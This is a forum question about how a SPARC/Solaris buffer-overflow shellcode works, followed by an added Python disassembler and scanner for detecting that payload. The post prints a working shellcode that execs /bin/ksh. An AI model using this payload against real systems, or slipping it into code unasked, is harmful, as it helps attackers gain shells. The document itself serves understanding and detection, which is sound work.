
buffer overflow attack in Solaris 10/SPARC

RexChan, Apr 12 2014

Hi all, I am doing hardware security research and am using a SPARC CPU shellcode, shown below:

"\x20\xbf\xff\xff" /* bn,a */
"\x20\xbf\xff\xff" /* bn,a */
"\x7f\xff\xff\xff" /* call */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0x0b,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh";

I know that when making a system call, we need:

1: Arguments in the output registers

2: The system call number in %g1

3: Trap 8

My questions are: what is the purpose of the BN (branch never) and CALL instructions at the beginning?

Why does it put /bin/ksh on the last line, and which part of the program uses this path, and how? Thank you!

Post Details
Locked on May 10 2014
Added on Apr 12 2014
0 comments
1,158 views
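The following is an added example for readers triaging a buffer like the one in the post; it is not part of the original post and not Oracle code. It is a small decoder for the SPARC V8 instruction forms that appear in the post (format 1 call, format 2 Bicc, and format 3 add/or/st/ta with an immediate), plus a scanner that reports the two features a detection rule for this family keys on: an annulled branch-never directly followed by a call to the previous word (a self-referencing call that leaves its own address in %o7, from which the delay-slot `add %o7,32,%o0` computes the address of the data appended after the ten instructions, here offset 8 + 32 = 40, where "/bin/ksh" sits), and a `mov N,%g1` followed by `ta 8`. The SAMPLE bytes are constructed from the ten words listed in the post; the syscall names are taken from Solaris' /etc/name_to_sysnum (11 is exec, 59 is execve); the function names (`decode`, `disassemble`, `scan`) and the choice to decode only these instruction forms are my own.

```python
import struct

# Register names in SPARC encoding order: %g0-7, %o0-7, %l0-7, %i0-7.
REGS = (["%%g%d" % i for i in range(8)] + ["%%o%d" % i for i in range(8)]
        + ["%%l%d" % i for i in range(8)] + ["%%i%d" % i for i in range(8)])

# Constructed sample input: the ten words and the trailing path exactly as
# the post lists them, assembled into one big-endian byte string.
SAMPLE = bytes.fromhex(
    "20bfffff" "20bfffff" "7fffffff" "9003e020" "92022010"
    "c0222008" "d0222010" "c0222014" "8210200b" "91d02008"
) + b"/bin/ksh"

# Solaris system call numbers relevant here (from /etc/name_to_sysnum).
SOLARIS_SYSCALLS = {11: "exec", 59: "execve"}


def sext(value, bits):
    """Sign-extend the low `bits` bits of value."""
    return value - (1 << bits) if value & (1 << (bits - 1)) else value


def decode(word):
    """Decode one SPARC V8 word into (mnemonic, operands, fields).
    Only the handful of forms used by tiny exec stubs are recognised
    (assumption: big-endian words, immediate forms only)."""
    op = word >> 30
    if op == 1:                                    # format 1: call disp30
        disp = sext(word & 0x3fffffff, 30) * 4
        return "call", "pc%+d" % disp, {"disp": disp}
    if op == 0 and (word >> 22) & 7 == 2:          # format 2: Bicc
        annul = (word >> 29) & 1
        cond = (word >> 25) & 0xf
        disp = sext(word & 0x3fffff, 22) * 4
        mnem = ("bn" if cond == 0 else "b%x" % cond) + (",a" if annul else "")
        return mnem, "pc%+d" % disp, {"disp": disp, "annul": annul}
    rd, op3, rs1 = (word >> 25) & 0x1f, (word >> 19) & 0x3f, (word >> 14) & 0x1f
    imm = (word >> 13) & 1
    simm13 = sext(word & 0x1fff, 13)
    src2 = str(simm13) if imm else REGS[word & 0x1f]
    fields = {"rd": rd, "rs1": rs1, "imm": imm, "simm13": simm13}
    if op == 2 and op3 == 0x00:                    # add
        return "add", "%s,%s,%s" % (REGS[rs1], src2, REGS[rd]), fields
    if op == 2 and op3 == 0x02:                    # or; 'mov' is or %g0,imm,rd
        if rs1 == 0 and imm:
            return "mov", "%s,%s" % (src2, REGS[rd]), fields
        return "or", "%s,%s,%s" % (REGS[rs1], src2, REGS[rd]), fields
    if op == 2 and op3 == 0x3a and (word >> 25) & 0xf == 8:   # ta (trap always)
        # V8 trap number is rs1 + imm7; only the %g0-based form is resolved.
        fields["trap"] = (simm13 & 0x7f) if (imm and rs1 == 0) else None
        return "ta", ("%s+%s" % (REGS[rs1], src2) if rs1 else src2), fields
    if op == 3 and op3 == 0x04:                    # st (32-bit store)
        return "st", "%s,[%s+%s]" % (REGS[rd], REGS[rs1], src2), fields
    return ".word", "0x%08x" % word, fields


def words_of(buf):
    """Split buf into aligned big-endian 32-bit words (trailing bytes dropped)."""
    return [struct.unpack(">I", buf[o:o + 4])[0]
            for o in range(0, len(buf) - len(buf) % 4, 4)]


def disassemble(buf):
    """Return [(offset, text)] for every word in buf."""
    return [(i * 4, ("%s %s" % decode(w)[:2]).strip())
            for i, w in enumerate(words_of(buf))]


def scan(buf):
    """Report (1) an annulled branch-never directly followed by 'call pc-4',
    the self-referencing call that leaves its own address in %o7, and the
    string the delay-slot 'add %o7,K,%o0' would point %o0 at; and
    (2) 'mov N,%g1' followed within two words by 'ta 8' (Solaris syscall N)."""
    decoded = [decode(w) for w in words_of(buf)]
    found = {"getpc_at": None, "path": None, "syscall": None}
    for i, (mnem, _, f) in enumerate(decoded):
        prev = decoded[i - 1][0] if i else None
        if mnem == "call" and f["disp"] == -4 and prev == "bn,a":
            found["getpc_at"] = i * 4
            nxt = decoded[i + 1] if i + 1 < len(decoded) else None
            if nxt and nxt[0] == "add" and nxt[2]["rs1"] == 15 and nxt[2]["imm"]:
                start = i * 4 + nxt[2]["simm13"]     # %o7 + K, relative to buf
                end = buf.find(b"\x00", start)
                found["path"] = buf[start:end if end >= 0 else None].decode("ascii", "replace")
        if mnem == "mov" and f["rd"] == 1 and f["imm"]:
            if any(d[0] == "ta" and d[2].get("trap") == 8 for d in decoded[i + 1:i + 3]):
                n = f["simm13"]
                found["syscall"] = (n, SOLARIS_SYSCALLS.get(n, "unknown"))
    return found


if __name__ == "__main__":
    for off, text in disassemble(SAMPLE):
        print("%2d: %s" % (off, text))
    print(scan(SAMPLE))
```

Run against SAMPLE, `disassemble` reproduces the mnemonics in the post's comments and `scan` reports the self-referencing call at offset 8, the path "/bin/ksh" at offset 40, and syscall 11 (exec) via `ta 8`; the two trailing words of the path decode as `.word`, which is the expected signal that data, not code, follows the trap.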